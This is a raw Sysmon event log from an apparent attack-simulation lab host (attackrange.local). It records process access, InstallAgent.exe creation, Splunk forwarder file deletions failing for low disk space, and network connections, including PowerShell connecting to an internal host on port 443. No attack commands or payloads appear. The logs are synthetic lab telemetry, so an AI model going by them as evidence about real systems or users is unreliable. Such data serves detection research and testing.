18:14:50.245{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085173Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.245{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4F1A-613A-5A90-03000000C801}5444C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085172Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.245{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4F1A-613A-5A90-03000000C801}5444C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085171Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.240{B81B27B7-4F1A-613A-5A90-03000000C801}5444C:\Windows\System32\InstallAgent.exe10.0.14393.4169 (rs1_release.210107-1130)InstallAgentMicrosoft® Windows® Operating SystemMicrosoft CorporationInstallAgent.exeC:\Windows\System32\InstallAgent.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=88C7DCDD735B31E4F5620E4B9F38C87F,SHA256=5EF1322B96F176C4EA4B8304CAF8B45E2E42C3188AA82ED1FD6196AFC04B7297,IMPHASH=EAB6EF3DE625719627DC808B5F0501FC{B81B27B7-4012-611D-0C00-00000000C801}732C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000035085170Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.214{B81B27B7-4012-611D-1400-00000000C801}8841372C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085169Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.199{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085168Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.199{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085167Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.199{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085166Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.199{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085165Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:50.183{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035085164Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:14.223{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56702-false10.0.1.12-8000- 23542300x800000000000000035085209Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:51.589{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=2C6312C177152790EA138127EE33787D,SHA256=F30D85DF28EC0DE26D1B8C7D0496F4AC3530D7D56AACC7F13875CF4BFF28E918,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085208Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:51.589{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=E5B7B975D9BEC43C2FDE6C0FCA0D6639,SHA256=91E967E6786F2019E733765672944E85468582BB2ED672041FA4979AA92BD9E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085207Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:51.327{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC31A53A930A74FBC1389908E664D1A5,SHA256=90CE3D0C3581B39B29C18EE513B752889F9A4F4F0E5B4CFE4C443F5FFA781FFF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085206Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:51.189{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA4F427AA3F86DE524C27857F711974F,SHA256=C992A9B3BAE30C072A93682C08308114E19606CE16F5348887BF40092E62F19D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085205Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:51.189{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F53CC91DE3826F3EDD16188E2D71382B,SHA256=BA48E7ABA98A0641FFF02CFFA60C7885FA31C26E84968ADBBDBF1CFEB0EDA246,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085212Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:16.706{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56704-false40.125.122.176-443https 23542300x800000000000000035085211Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:52.344{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98E465301B8613DB39D3D365F25D785B,SHA256=155343992DCB3AE1774B7A5E972233196F3910E1CA84352F7E9159E7A399EC4E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085210Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:16.598{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56703-false40.125.122.176-443https 23542300x800000000000000035085213Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:53.375{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D995644051DE51355A5BDBDAC99F668F,SHA256=81ED9764FD1E76D8D330E273A9E8A9DD7CA410676BE70571853CAE5658D84D88,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085215Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:54.926{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085214Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:54.389{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B23D2812296324DE7C208DD75CE5306E,SHA256=68DB6BE36CB86DCE3E3078F8498466E18CC9D90E5DEC38E896A1F11D0508B503,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085216Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:55.421{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97AE46834BEAD399BCD6A348B9177209,SHA256=FF7FE07FCC76F20FE51052C244BFF85287BCCBF55720828C2B923067524F8638,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085220Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:56.602{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE890B35312896011E6FA577086E4514,SHA256=B80209D31DB70E57F333E8913B49F1E9768108F2BECB243E72BE1EE7CB1B93F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085219Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:56.602{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FA4F427AA3F86DE524C27857F711974F,SHA256=C992A9B3BAE30C072A93682C08308114E19606CE16F5348887BF40092E62F19D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085218Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:56.440{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85D8D78C29A0B8A6C2F8636B69C7429E,SHA256=D6097CAB83DDC0C89BAFE350568191333340A4DFE84031C20C37D52CB6FEFA33,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085217Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:20.097{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56705-false10.0.1.12-8000- 23542300x800000000000000035085224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:57.987{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE890B35312896011E6FA577086E4514,SHA256=B80209D31DB70E57F333E8913B49F1E9768108F2BECB243E72BE1EE7CB1B93F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085223Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:57.956{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E8029BE94D73723BF0FF6538ABFBEDAE,SHA256=DA49DD18430EE551AAFE56DB58F23AD45E8160F8ECD60E81DEB03649555D5239,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085222Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:57.441{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63F257213E684759AD22392CCF8C6F45,SHA256=DF6D4DBC18C495872B6C1169839BAE6CD1549ED47535C8019D0BF625355E43F8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085221Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:20.927{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56706-false10.0.1.12-8089- 23542300x800000000000000035085225Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:58.456{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=465AEEC2832511FFF1A55EA3E8B5AE4E,SHA256=645B2BA2B3165B8D5858E71420CB9B6CB4688E0B7B48A3456E232AE77AF98174,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085227Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:14:59.471{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97EBE479EA25FA397F8592A3E3DFC198,SHA256=9C5040F41FDEBB35A0E370B2DCB1FAA5A542249DFB28F54491E4EB25C54C130A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:23.246{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56707-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085228Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:00.486{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ADAE218267B6564904629FD0EF1CDED,SHA256=A839C0086BB1FB10DD2F120908AC8A6AC8AF91DA4898E8F33EDAE9362638A93D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:01.487{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52FB4C40277BC1506C01DE39B4913FA7,SHA256=E72526952C683F1990FA0944F21B4DF06A309A05D1FC097EB3F0F6E186E1508E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085231Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:02.520{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E781B3B0B0476ECD6335223BC8633E0,SHA256=2D63FBD4FACC0FCE1ED327C5D074AA7B3588E52EDEBC045E124B419C14F6FC1C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085230Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:26.077{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56708-false10.0.1.12-8000- 23542300x800000000000000035085232Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:03.538{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B36830BC89B890EB04E4EC12AAA64BB2,SHA256=47029A87D3F53C0A69A68C3E6CBF58505F0E6CAAC60CC7BDF44EBAAAA29A2001,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085234Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:04.553{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90FF0FEDB2244C8572F0B1093D0BEB47,SHA256=9A4D87E0E178C1D2C14E11F1372DB580FB10DEC224DFD46D4E25B43F1D72C33E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085233Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:04.468{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DEDF54AAB5B0AF1BD62E6519F15D58F4,SHA256=B7DA4ECD36C7BB82EBF9115F4C2B32AC454401CE2CDA370312C327B8CED6A2B5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085236Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:05.583{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=191060ACB75F4689A2B2990BD06F4DE6,SHA256=A3A7DEBDB9C4FD69497CB3BC092F265A35E3F94428091BED4C2480F352A30121,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085235Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:29.261{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56709-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085237Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:06.598{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2729B1611B23317F445800C306EA73D,SHA256=A35EEC770B93AC60D2B1F5A4F17EC878BAD729A367B9979A783728620A19CD08,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085250Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.655{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 